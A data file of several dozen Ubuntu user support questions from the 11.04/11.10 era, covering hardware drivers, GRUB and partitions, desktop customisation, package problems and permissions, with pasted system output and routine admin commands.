79783	strange random display issue	i had this random display issue ever since ubuntu 11.04 and now running ubuntu 11.10 and this problem still persist . it is very hard for me to explain , so i uploaded a video to elaborate itself . before i convert from windows 7 , this issue never happened . the symptom is so random that i can not reproduce or tell precisely when will this happen again . my wild guess is , should this be related to driver ? below are my detail system information : $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation h67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) 02:00.0 ethernet controller : broadcom corporation netlink bcm57788 gigabit ethernet pcie ( rev 01 ) is there any other information i need to post and how do i do that ?
79784	gpu frequecy scaling indicator	i have ati radeon 6320 graphics . as cpu frequency scaling indicator is there any gpu frequency scaling indicator ? where i can set possible gpu clock speed or mode ( performance , power-saving , etc ) . note : i am not talking about over-clocking of gpu . thanks in advance .
79791	can you recommend a very quiet or silent laptop that will work well with ubuntu ?	i need to buy a laptop for work reasons . i will be installing ubuntu on it , and i would like it to be a quiet machine because noisy computers are my pet peeve . can anyone recommend one which will not give me too much dramas with hardware and drivers support in ubuntu 11.10 ?
79792	tools to reindex mov file	i have some header corrupted mov file . is there are any tools in ubuntu to reindex mov file . i tried to convert the file using ffmpeg but it shows no videos and some audio noise . also report read stream error . thanks in advance .
79793	how do i use groundcontrol in 11.10 ?	when i installed bazaar explorer on a fresh system the other day , i came across this ground control . i had a look at its web page on http : //ground-control.org/ and it looked seriously awesome , so i installed it from ubuntus repositories . however , i ca n't find any way of starting it . apt-file shows that it should provide a file named /usr/share/applications/groundcontrol.desktop , but there 's no such file . can someone shed some light on this ?
79801	rabbitvcs suddenly stopped working in nautilus	a while ago i installed rabbitvcs on ubuntu 11.04 . it then all worked pretty well , but since a few weeks ( maybe even more than a month ) rabbitvcs suddenly disappeared from the nautilus context menu . i visited this page : http : //wiki.rabbitvcs.org/wiki/support/known-issues and saw some points i could try , but none of them worked out to a working version again . also this issue rabbit vcs stopped working after upgrade to 11.10 does not describe the solution for me , so i think it might be something else . i have also tried to reinstall rabbitvcs again from the ppa which was recently updated according to this topic , but no luck . i am still on 11.04 ( as i do n't like the way ubuntu is going in newer versions at all ) and my nautilus version is 2.32.2.1 . is there someone who can help with this one ?
79804	run a gui program at startup on top of x with no window manager	i want to start a program on top of x after startup . i want no desktop manager , nor window manager , but i just want to start a single program like firefox after startup . is there a standard way to do it ?
79807	why are some bugs i 'm affected by and subscribed to missing in my launchpad bug list ?	i have a long list of bugs in my launchpad account but some bugs i set to being affected by and being subscribed to are not showing up in that list . even when i change the options of bugs to show i do n't get these bugs . first i thought these were bugs being set to 'wishlist ' but some of them are showing up in the list . does anyone else know that he/she is subscribed to a bug he/she does n't find in his bug list ? and maybe there 's also someone who knows how to fix this .
79808	context menus on eclipse hang and disappear , app hangs whole os	i 'm experiencing problems with eclipse development on 11.10 . i am developing an eclipse rcp application . when i launch the app from eclipse and work with it for a bit gradually the context menus show less options , then disappear completely . at this point the ui of the whole os hangs , i have to switch to console mode and kill my rcp . it seems to happen anytime between showing 1 context menu and many ( 20+ ) . it happens if i run the app in normal or debug mode . it happens if i run with unity or unity 2d . it did not happen on my 10.04 install . here is what i 've tried : tried running with the sun jre and the issue still occurs . using gnome instead of unity and the issue still occurs . has anyone else experienced this / can anyone give me some pointers on where the issue may be ?
79812	customizing gnome shell in 11.10	since unity on my old mbp is not that snappy , i really want to change my gui to gnome shell . however , i 've really been struggeling with the customization of gnome shell . can you help me with the following : is is possible to have the dock on the screen all the time ? can i enable 'hot corners ' for features like 'scaling ' in compiz ? is there a ccsm-like gui configuration tool ? can i enable wobbly windows in gnome shell ? how do i change the shortcut for the win-key to start this 'gnome-mission-control ' ( by that i mean this thing u see when going to the top left corner ) . thank you .
79813	how to remove a second ubuntu install ?	i installed windows xp in dual-boot with ubuntu to play skyrim and that ended up breaking grub . after trying zillions of things to fix it ( including using boot-repair ) , i installed ubuntu in a new partition , side-by-side with the old ubuntu and xp . after that grub worked again and i can now access my old ubuntu and xp , but now i have two ubuntus and i want to drop the new one . how do i do that without breaking grub again ? here 's the result for sudo fdisk -l : device boot start end blocks id system /dev/sda1 * 1 17303 138986316 83 linux /dev/sda2 19799 29359 76798732+ 7 hpfs/ntfs /dev/sda3 29360 30401 8369865 82 linux swap / solaris /dev/sda4 17304 19798 20040705 5 extended /dev/sda5 17304 17595 2343936 83 linux /dev/sda6 17595 18811 9764864 83 linux /dev/sda7 18811 19677 6952960 83 linux /dev/sda8 19677 19798 975872 82 linux swap / solaris sda1 and sda3 are my old ubuntu , sda2 is windows xp , and sda4 to sda8 are the new ubuntu install ( i created different partitions for /boot , / and /home , should not have done that just to fix grub ) . and /etc/fstab looks like this : # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=e41d0403-82db-4379-9d3e-b67cb06fc08d / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=5a54507a-82f0-4275-b531-f88b9cfabbcb none swap sw 0 0 and here is the report from boot-repair : http : //paste.ubuntu.com/740188/ and here is the list from /dev/disk/by-uuid : ubuntu @ ubuntu : ~ $ ls -la /dev/disk/by-uuid total 0 drwxr-xr-x 2 root root 140 2011-11-16 13:21 . drwxr-xr-x 6 root root 120 2011-11-16 13:19 .. lrwxrwxrwx 1 root root 10 2011-11-16 13:19 11f7-4048 - > ../../sdb1 lrwxrwxrwx 1 root root 10 2011-11-16 13:19 40b84b5c-dd62-4267-a41c-e5afc0c178a4 - > ../../sda3 lrwxrwxrwx 1 root root 11 2011-11-16 13:19 82672ddd-82ac-4d41-98c2-fc359f248f3b - > ../../loop1 lrwxrwxrwx 1 root root 10 2011-11-16 13:21 de34ed7a34ed5655 - > ../../sda2 lrwxrwxrwx 1 root root 10 2011-11-16 13:21 e41d0403-82db-4379-9d3e-b67cb06fc08d - > ../../sda1
79818	edimax ew-7811un usb wireless - sees network but fails to connect to it	yesterday i got my first ubuntu ( 11.10 32 bit ) installation ( wish me luck ) , and i ran into a problem with my usb network card . i use a wireless usb stick by edimax ( it is called ieee802.11b/g/n nano usb adapter or also ew-7811un ) . my problem is that ubuntu seems to be able to use the usb to see the networks around me , but when i try to connect to my network - it just keeps trying and failing . i am connected to the internet through a 300m wireless n router model no . tl-wr841n / tl-wr841nd i have other computers in the house which are able to connect to the internet . and the same computer previously had windows on it - and it managed to connect to the internet with no problem . can you please advise on how this can be resolved ? ( what output should i send you ? ) thanks !
79819	software centre will not download software	software centre will not download anything at all . gives an error message saying it 'failed to download package - check internet connection ' . and , sometimes , if you try again , 'involves downloading untrusted packages ' . any ideas ?
79822	installed wine on lubuntu 11.10 via synaptic . it 's not listed anywhere though . what went wrong ?	a reboot did n't help . ca n't start the program via alt/f2 neither .
79829	serious issue with file-roller , it crashes constantly ?	when i open file-roller from terminal , it shows these warnings : ( file-roller:8301 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( file-roller:8301 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed ( file-roller:8301 ) : gtk-critical ** : gtk_style_provider_get_style_property : assertion `g_type_is_a ( gtk_widget_path_get_object_type ( path ) , pspec- > owner_type ) ' failed when i try to open an archive from file-roller , it crashes and shows this error glib-gio-error ** : settings schema 'org.gtk.settings.filechooser ' does not contain a key named 'last-folder-uri ' trace/breakpoint trap also , it does n't have any style , and it ca n't extract or compress files . it does n't work at all now ! i tried purging , switching to another user , reinstall it ... and even reinstalled the whole desktop package . but still no luck : -s. note : my machine is on lubuntu 11.04 , the problem started to happen since i removed a package ( do n't remember ) and the package manager mistakenly removed file-roller too . before that it works perfectly ... appreciate any help , thank you .
79832	exotic graphical user interfaces for ubuntu	what non-traditional graphical user interfaces currently run on ubuntu ? i do n't mean hand-wringing over gnome shell and unity , nor behind-the-scenes changes like wayland . i mean something that the end user would experience as completely different : new interface paradigms ( not just smartphone-like ) , 3d interfaces [ 1 ] , clones of bumptop or microsoft bob , wildly animated windows and widgets , and the kinds of things you might see only in movies . please include : visuals : screenshots , links to screenshots or links to videos that demonstrate the difference between this and a traditional interface instructions : ( or a link to instructions ) on how to install them on the current version of ubuntu ( i am not looking for examples that require exotic input devices . something you could install and play with on a regular desktop or laptop machine . ) [ 1 ] `` it 's a unix system , i know this ! ''
79834	desktop sharing on ubuntu	i am searching for a desktop sharing solution on ubuntu that has the same features as remote desktop on windows . i tried a vnc , freenx xrdp , remote x but none of them fulfils my requirements which are i can start working locally then go home and connect to the same desktop with all my applications runnung vnc : yes , nx : no , remote x : no if i connect remotely i dont want my local computer show what am i doing vnc : no , nx : yes , remote x : yes when connecting remotely i want the remote desktop to be resized to the same as my local vnc : no , nx : yes , remote x : yes perform well vnc : no , nx : yes , remote x : no is there any tool that has a yes for each feature ? as it is shown nx does almost everything but the first requirement
79837	how can i set the unhide speed of the gnome-classic panel ?	i have installed gnome-session-fallback . i followed h책kon a. hjortland 's excellent instructions from how to customize the gnome classic panel , but autohide ( and even more importantly unhide ) is still at the default overly slow speed . how can i set the unhide speed of my top and bottom panels ?
79839	set default owner/user	i 'm a web developer , and so have set-up an old machine in the office as an ubuntu server , for the purposes of testing websites . i 've set-up lamp and have created a /var/www folder , from which all my local sites are served . the issue is that of user permissions , i.e . any files that i copy into that folder ( from my windows machine via the network ) automatically take on me ( daniel ) as their owner . the problem is that i want www-data to become the owner . i did some research and saw that it should be possible to use setuid ( and setgid ) to automatically set www-data as the owner of all files put into /var/www automatically , so far i 've not had any luck making it work . can someone help please ? thank you update : would this do what i want it to do ? default file permissions for php user www-data update 2 : i 've kinda fixed my issue by changing my samba settings . using webmin , i was able to go in and change the default settings ( as seen here : http : //imageshack.us/photo/my-images/521/captureon.png/ )
79842	keybinding issues with xmodmap across synergy	i 've got two systems i use across synergy . on the main one i have a normal keyboard that i swap caps lock and ctrl for . so i do : xmodmap -e 'keycode 66 = control_l' xmodmap -e 'clear lock' xmodmap -e 'add control = control_l' where keycode 66 is my caps lock key . the trouble is that i ca n't get this key to act as a control key on the other machine i connect to with synergy . the strange thing is that if i plug a keyboard into the machine , and run xev , the control key there is keycode 37 . when i then hit my modified control key ( keycode 66 on the master ) it 's registering as keycode 37 on the remote machine . so according to xev , it should be picking it up as a control keypress . anyone have any hints on if synergy is doing something overly helpful for me ?
79847	how precisely does ubuntu handle hotkeys	i was wondering if anyone could tell me the locations of the relevant services/libraries/whatever ubuntu uses for hotkey management . i 'm writing a gnome-shell extension at the moment because i 'm sick of not having the compiz grid hotkeys and i wanted to know how hotkeys are handled elsewhere in the distro , so i can check during install whether the hotkeys i 'm using are already registered to another application ( typically , they should n't be , but it pays to check ) . thanks in advance !
79852	error loading wallpaper	when i press `` ctrl+alt+f3 '' it goes in cli mode and then when i press `` ctrl+alt+f7 '' error loading wallpaper all things are working properly just my desktop wallpaper seems to be crashed
79859	i can not open the system category in ubuntu software center.. ?	whenever i try to open system category just shows the loading animations which stops and then i have to force quit it , all the other options like internet , games , education ect everything am able to open just their 's problem with system option . am stuck somebody please help me asap i have just started using ubuntu and loving it.. ! !
79862	mintmenu recent documents	i install the mintmenu and i am starting to like it but i miss a feature i liked in the ubuntu `` application - places - system '' menu . i can not find my recent documents it is possible to add/show the `` recent documents '' in the mintmenu ? i did : sudo add-apt-repository ppa : webupd8team/mintmenu & & sudo apt-get update sudo apt-get install mintmenu i am using ubuntu 10.10
79863	dash home as was in 11.04	is there any way to have the «dash home» icon as was in natty , i mean , not as part of the dash but of the panel ?
79872	how to install flashplugin-installer and ttf-mscorefonts-installer using apt-cacher-ng ?	on my network i use apt-cacher-ng on server and add acquire : :http { proxy `` http : // [ 10.48.21.23 ] :3142 '' ; } ; to /etc/apt/apt.conf on clients . so apt-get ca n't download file through proxy with wget .
79874	dash home button brings up blank window	i have searched everything i can think of and i have n't been able to find the answer to my particular problem so if it 's here , i just searched it wrong and i apologize in advance . i am brand new to ubuntu so please be gentle with me . : ) here 's my issue : i installed 11.10 on my son 's 5 year old computer and it works well except when he clicks the top `` dash home '' button . it does n't show anything . it grays out everything behind it like normal but there is nothing there . it 's just blank , no search option or apps button to click so he ca n't see what apps he has installed . here 's another weird thing about it . it showed up fine as i was installing and getting apps he would need , but he uses this computer at school . when we brought it in to school , that 's when the problem started . i brought it back home earlier this week , plugged it in and it showed up . brought it back to school , just went out there today to test it and it 's blank again . what could be the issue there ? it 's possibly just a coincidence . it surely could n't have anything to do with the network , right ? i ca n't imagine why that would interfere .
79885	netgear wna1100 stopped working	i 'm facing a rather strange issue with the usb wireless adapter wna1100 . i was able to connect to wireless using this yesterday . however , today am not . lsmod shows ath9k_htc , ath9k_common , ath9k_hw , ath and ndiswrapper . i 'm not sure if this is relevant to the above problem , but between yesterday and today , the only change was an upgrade to ubuntu 2.6.38 kernel , which caused the nvidia driver to break ( i have a 7300gt ) , so i had to ignore that kernel , reboot into 2.6.35 , and rebuild nvidia module from nvidia-installer-270.run . help ?
79888	my new hard drive wo n't automount on boot	i installed a new hard drive right before installing the new ubuntu 11.10 by reformatting , not upgrading . i was able to mount my drive , and partition it . it 's a 1tb , and i was able to transfer all of my music , and videos to it . for some reason , it wo n't mount on boot , and i ca n't figure out how to manually mount it afterwards either . here 's my current /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=e0fbdf09-f9a0-4336-bac3-ba4dc6cfbcc0 / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda5 during installation uuid=adf15180-c84c-4309-bc9f-085fd7464f89 none swap sw 0 0 /dev/sdc1 /media/sdc1 ext4 defaults 0 0 the last line is what i added for my hard drive . here 's the output from sudo lshw -c disk : % sudo lshw -c disk ~ *-disk:0 description : ata disk product : st3250310as vendor : seagate physical id : 0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 3.ad serial : 6rybf2qe size : 232gib ( 250gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000da204 *-cdrom description : dvd-ram writer product : dvd+-rw dh-16a6s vendor : plds physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : yd11 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc here 's the output of sudo df -h : filesystem size used avail use % mounted on /dev/sda1 226g 49g 166g 23 % / udev 2.0g 4.0k 2.0g 1 % /dev tmpfs 792m 1.1m 791m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 2.0g 2.3m 2.0g 1 % /run/shm
79889	how to backup my ubuntu , so that i can clone the same setup to another pc ?	how can i make a boot-able cd of my existing ubuntu including all the modifications i did ? . so , that i can use that cd to my another same new pc to start quickly all setup done . follow up : $ sudo apt-cache search remastersys $ sudo echo `` deb http : //www.geekconnection.org/remastersys/repository karmic/ '' > /etc/apt/sources.lits $ sudo apt-get update $ sudo apt-get install remastersys $ remastersys -h usage of remastersys 2.0.18-1 is as follows : sudo remastersys backup|clean|dist [ cdfs|iso ] [ filename.iso ] examples : sudo remastersys backup ( to make a livecd/dvd backup of your system ) sudo remastersys backup custom.iso ( to make a livecd/dvd backup and call the iso custom.iso ) sudo remastersys clean ( to clean up temporary files of remastersys ) sudo remastersys dist ( to make a distributable livecd/dvd of your system ) sudo remastersys dist cdfs ( to make a distributable livecd/dvd filesystem only ) sudo remastersys dist iso custom.iso ( to make a distributable iso named custom.iso but only if the cdfs is already present ) cdfs and iso options should only be used if you wish to modify something on the cd before the iso is created . an example of this would be to modify the isolinux portion of the livecd/dvd
79890	alternative offline upgrade method	how can i upgrade to ubuntu 11.10 from 11.04 other than online ? thanks for your reply . i have downloaded the iso file but when i run the cdromupgrade script and selected the option not to use t he internet connection .but after some time the upgrade fails stating that no internet connection , fail to fetch files
79898	how to add permission to an ftp account	i add a new subdomain with plesk , and with command line i 've copied a directory from the root to the directory of the subdomain , when i connect with an ftp account i do n't have the right permission for this folder , and i ca n't change them from the ftp
79899	are there unity-like quicklists for gnome ?	is there a way to have quicklists like in unity but then in the gnome 3 dash ? mainly i would like to be able to open a specific directory in nautilus directly , like this quicklist , and be able to open certain commands in the terminal directly , like this quicklist . is there quicklists in gnome or is there some other way of achieving this quick way to enter directories / commands ?
79906	installing lbp 2900 printer - > libs folders wrong ?	i am trying to get my canon lbp2900 printer to work on ubuntu 11.10 64 bit . what i have done is try to follow the steps on https : //help.ubuntu.com/community/canoncaptdrv190 so i downloaded the version 2.3 driver and tried to convert the rpm files to debian and installed them sudo alien cndrvcups-capt-2.30-1.x86_64.rpm cndrvcups-common-2.30-1.x86_64.rpm sudo dpkg -i cndrvcups-capt-2.30-1.x86_64.deb cndrvcups-common-2.30-1.x86_64.deb restarted cups and try to install the printer with lpadmin : sudo service cups restart sudo /usr/sbin/lpadmin -p lbp2900 -m /usr/share/cups/model/cncupslbp2900captk.ppd -v ccp : //localhost:59787 -e what i noticed however that on the step with lpadmin it goes wrong with the error : lpadmin : bad device-uri scheme `` ccp '' after trying to trace what has gone wrong , i think i nailed it to the fact that dpkg installed a file /usr/lib64/cups/backend/ccp instead of /usr/lib/cups/backend/ccp checking the original rpm with archive manager shows indeed that /usr/lib and /usr/lib64 are used , with the backend/cpp file only installed in lib64 . as i understand correctly , ubuntu 11.10 uses /usr/lib32 and /usr/lib instead so the files are installed in the wrong place . is there an automated method of converting the rpm/deb files with the wrong lib structure to one with the right lib structure for ubuntu 11.10 ? or am i completely on the wrong track for getting my printer installed ?
79910	how can i run unity with slim with sound	i 'm trying to start the unity environment from slim display manager , everything goes fine , except by the sound that do n't work , the device just dont appear in the device list i already changed the slim config file to start with this code below , but it didnt solve the problem ... . login_cmd exec ck-launch-session dbus-launch /bin/bash -login /etc/x11/xsession % session i believe the it is related with some thing that the gdm/lighdm start with the session and slim dont do that when i use the lighdm or gdm to start the environment everything works fine
79912	windows 7 restarts pc when selected from grub menu	i installed windows 7 on a raid 5 ( 2 @ 160gb sata +1 @ 160gb sata for raid 5 ) i then proceeded to install ubuntu 11.10 using the live cd and opted : '' install along side windows 7 option '' upon boot grub appears normally and i can select and run ubuntu with no difficulties . when i select windows 7 from grub the pc restarts and consequently goes back to grub . i have attempted to use the windows 7 dvd to repair the installation but to no avail . the wizard ran twice as it described it might , after the second attempt came back with an ' ... inability to repair ... ' error . i am sure there is an answer to this somewhere but i have yet to be able to find it . ( 2 weeks and countless attempts and searches before posting this question . although i am happy to use ubuntu alone my wife likes to watch netflix and therein requires the windows 7 installation .
79919	how can i toggle between tree view and places in nautilus ?	i want to know if there 's a hotkey in nautilus to toggle between tree view and places . i googled around but i have n't found any solution ... if there is n't such a hotkey , is it possible to suggest nautilus ' developers to implement this in future versions ? i really like the `` places '' feature , but in some occasions tree view is more suitable to my needs .
79920	how do i change changing the default program when plugging in removeable media ?	i have updated to ubuntu 11.10 . the problem is when i plug in my external harddisk , all the files are trying to get opened with movie player . also when i click the icon of external harddisk which shows up automatically when we plug in external harddisk in the right side panel , movie player opens up and try to open the files in it . how can i change this default opening program from movie player to file browser ?
79923	how can i install emerald theme manager , and switch between emerald and metacity themes ?	i want to get emerald theme manager to work in ubuntu 11.10 and activate its themes . also , i want to be able to switch between emerald themes and the originally installed ( metacity ) themes . how do i do it ?
79925	how do i fix the buttons close minimize maximize ?	sometimes the bar with close minimize maximize buttons dissapears im using 11.10 i messed with compiz once and deleted it it fixed the problem , but its back now it seems the bar crashes sometimes
79926	`` do-not-disturb '' mode for notify-osd	is there a way to enter a `` do-not-disturb '' mode for notify-osd in oneiric ? i noticed this functionality in gnome shell and was curious about any way to stop or silence notify-osd temporarily . thanks in advance .
79928	best practices for maintaining ubuntu packages across versions ?	i have a bunch of packages in my ppa and a reasonable knowledge on how to build debian/ubuntu packages , so far so good . my issue is that i do n't really have an idea how to properly maintain them for different versions of ubuntu and how to handle ubuntu upgrades . right now i am doing all of these things manually , which for most part simply means updating the version number in debian/changelog and reuploading them , which sounds easy enough , however when having to do that for a dozen packages , across numerous versions of ubuntu , things can get a little tiresome and error prone . when there are small changes needed to be done to the debian/control files , debian/rules or the source things get of course even more complicated . while i can maintain those changes in git-buildpackage fine , getting constant merge conflicts in the debian/control file , due to backports having different version number then the current package , kind of throws me of the rails and makes things even more complicated . so essentially : what are some best practices for building and maintaining ubuntu packages , so that it 's easy to make them available across multiple version of ubuntu ?
79930	dpkg-deb : error : subprocess paste was killed by signal ( broken pipe )	the software upto date option automatically download the upgarde for gimp . but while installing its giving me the error . how to upgrade the same reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : gimp suggested packages : gimp-help-en gimp-help libgimp-perl gimp-gap gimp-console the following packages will be upgraded : gimp 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/4,388 kb of archives . after this operation , 324 kb disk space will be freed . do you want to continue [ y/n ] ? y ( reading database ... 151157 files and directories currently installed . ) preparing to replace gimp 2.6.11-2ubuntu4 ( using ... /gimp_2.7.4-2011102201~oo_amd64.deb ) ... unpacking replacement gimp ... dpkg : error processing /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/gimp/2.0/plug-ins/file-xmc ' , which is also in package gimp-plugin-registry 3.5.4-1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) errors were encountered while processing : /var/cache/apt/archives/gimp_2.7.4-2011102201~oo_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
79931	have movie player always stay on-top of other windows	is there a way to make the movie player to stay on-top while switching windows ?
79932	messed up partition table accidentally	i was using gparted software in ubuntu 11.10 ( using live cd ) . in which there is an option called create partition table , i clicked it and it removed the details of my entire partition . now i 'm not able to see any of my partition ( it has windows 7 installed and my personal files ) . but since i have not formatted my hard disk , i guess the data should be still there . is there any way i can fix this partition table ?
79933	deleted myself from admin group - now getting error usermod : can not lock /etc/passwd ; try again later	i have a laptop with ubuntu 11.10 that is shared between myself and two other family members . my user id was setup as the only `` administrator '' on the laptop . the other users were setup as `` standard '' users . in my attempt to try to add myself to the user groups for the other users , i somehow deleted myself from the admin groups . i used the `` usermod '' command from the terminal . i must have neglected to include the proper switches or syntax for the update . it looks like i successfully added my userid to the group associated with my wife 's account . when i use the `` groups '' command , i can see only my id and my wife 's id in the list . i no longer see the `` admin '' or `` adm '' groups , and others that used to be listed . when i go into system settings > user accounts it looks like my id is now listed as a `` standard '' user . i would like to change my account back to `` administrator '' , but now i ca n't . i did some searches for solutions and found that i would need to boot into recovery mode and execute the usermod command from the root session . i was able to successfully boot into recovery mode and get to the root session . i was trying to execute the command `` usermod -a -g admin user1 '' to add my id ( user1 ) back to the admin group . when i execute the command from the root session , i get the error message `` usermod : can not lock /etc/passwd ; try again later '' . i tried preceding the usermod command with `` sudo '' , but it did n't make a difference , same error . i then tried adding a new user using adduser , thinking i would try to create a new userid and make the new userid part of the admin group . i get the same error using the adduser command . i saw some posts that recommend looking for and deleting files that end in `` .lock '' in the etc directory . the only file i found was .pwd.lock which i have n't touched . i am at a loss as to what to try next . i am relatively inexperienced with ubuntu and linux , so alot of this is new to me . any help you can provide would be much appreciated .
79938	is there a way to access my music on vista while i work on ubuntu ?	i have installed ubuntu using wubi alongside vista on my laptop . is there a way for me to gain access to itunes that is on vista ?
79944	dosbox has no sound	i try to run a game under dosbox , but it has no sound , and in the terminal dosbox says : mixer : ca n't open audio : no available audio device , running in nosound mode . alsa : ca n't subscribe to midi port ( 65:0 ) nor ( 17:0 ) midi : opened device : none update i changed the ports to 128:0 in the dosbox config file and now it says alsa : client initialised [ 128:0 ] midi : opened device : alsa but still no sound : (
79946	how to get a `` maximize '' button in every window in gnome fallback	just installed ubuntu 11.10 ( amd64 ) , and immediately switched back to gnome with gnome fallback . i 'm searching for a feature which provided a `` maximise '' button in every window , even ones which should have only the `` close '' button . in older ubuntu versions this feature was activated when switching from `` none '' to `` normal '' in `` visual effects '' : but now , that window is out , and i ca n't find that feature . i guess it 's somewhere in compizconfig , but i 've searched there with no result . does anyone know what 's the feature i 'm searching for ?
79949	how to add language indicator ?	i have ubuntu 11.10 . i have installed gnome-classic using : sudo apt-get install gnome-panel the problem is , the top panel does n't show the language i am using right now ( i use 3 different languages ) so when i switch between languages ( ctrl+shift ) , nothing changes or indicates the current language on the top panel . any ideas or tips would be appreciated .
79952	how to restrict total time usage for an account	i 've looked at a number of other threads but most of them talk about how to restrict the time of day an account can log in ... what i 'm looking for is a simple way to restrict the total usage minutes during any 24-period , e.g . i want to allow `` jsmith '' to be logged in a total of 120 minutes per day . i do n't necessarily care when jsmith is logged in ; i just want to cap his total time at 120 minutes during the 24 hour period 0000-2400 . i looked at the question , `` how do i restrict my kids ' computing time '' but again that focuses on when the account can actually log in , not how long the account is allowed to remain logged in . the solution needs to `` remember '' previous logins even after the user has logged out ; for example if jsmith logs in for an hour in the morning , then logs out , jsmith should not be allowed to remain logged in for more than an hour in the afternoon or evening , for a total of 2 hours usage per 24-hour period . what is the easiest way to accomplish this in ubuntu 11.04 ?
79953	why does plymouth start so late ?	it appears that starting with 11.04 plymouth starts so late in the boot process . sometimes i only have a split second to see it before it transitions to the login screen . this is the same for 11.10 . compared to 10.04 and 10.10 , plymouth starts only a couple seconds or so after grub and is very visible within the entire boot process . is there something that can be done to have plymouth run earlier ? i have experienced this on 3 different machines and on 2 of these machines , i 've been running ubuntu since 10.04 . so it 's not just my notebook 's hardware that is causing this . *one a side note , the boot process is one of the ugliest parts of modern linux . ubuntu is not excluded . after almost a decade , ( i forget but was bootsplash the first ? ) this still has only been partly solved . for a couple of seconds ugly text is still seen when shutting down . on several ocassions , the same ugly text is seen when logging out of a session . it 's never as smooth as you want it to be . splash themes are great , do n't get me wrong . it 's just the transitions that are way off and you get glimpses of what 's underneath . i 'm used to this but for those new to ubuntu and coming from windows . it is a turn off . * pardon the rant . : )
79956	how to check my hdd 's for defects	because i had some problems with my server i want to check it 's hard drives for defects ( the drives not the file system ) which tool can i use for this in ubuntu ? i know for my hard drives there is a cd from western digital ( data lifeguard ) but i ca n't get it to run via usb cd drive . so are there any native alternatives ? system information : acer easystore h341 intel atom d410 1.66ghz 2x 1tb western digital caviar green ( wd10eads-00p6b0 ) 2x 1tb western digital caviar green ( wd10eads-22m2b0 ) ram 2gb
79961	application dash as default	when pressing the super button the dash opens . it will always open in the home format . on the bottom you can choose between different lenses , the second one being the application lens with filter functionality . is there a possibility to set the application lens as the default when opening the dash ?
79964	can i update a single package with out a full distro upgrade ?	i want vim 7.3 on my server . i do n't want to do a full distro upgrade just yet . is it possible to pull the next version of vim from an updated version of the repositories with out performing the full upgrade ?
79969	keep xubuntu network manager from overwriting resolv.conf	how do i keep xubuntu 11.10 from overwriting resolv.conf everytime i reboot my machine ? everytime i reboot , i get an overwritten resolv.conf that has the words # generated by network manager and no nameservers specified . i ran the following to get rid of network manager , but it 's still replacing my resolv.conf when i restart the machine . sudo apt-get -- purge remove network-manager sudo apt-get -- purge remove network-manager-gnome sudo apt-get -- purge remove network-manager-pptp sudo apt-get -- purge remove network-manager-pptp-gnome
79972	transmission not downloading	i 'm using the transmission which was shipped in 11.10 . all the configurations in ubuntu 11.10 are the same as they are in my mac os . in ubuntu , transmission is not downloading at all : 0 peers at all times . when booting into mac os , all seeds turned out to be fine ( high speeds , lots of seeders ) .
79977	screensaver suppression on video playback	i migrated from ubuntu 10.10 to xubuntu 11.10 ( clean install ) . previously when i played video via fullscreen mplayer the screen lock did n't activate . now i get screen lock after a couple of minutes whether the machine is just idle or playing . is there some option i have to switch to get this working ? settings for screensaver : mode : blank screen only blank after 10 min cycle after 10 min lock after 10 min ( + enabled ) advanced options checked : `` fade to black when blanking '' , `` grab desktop images ''
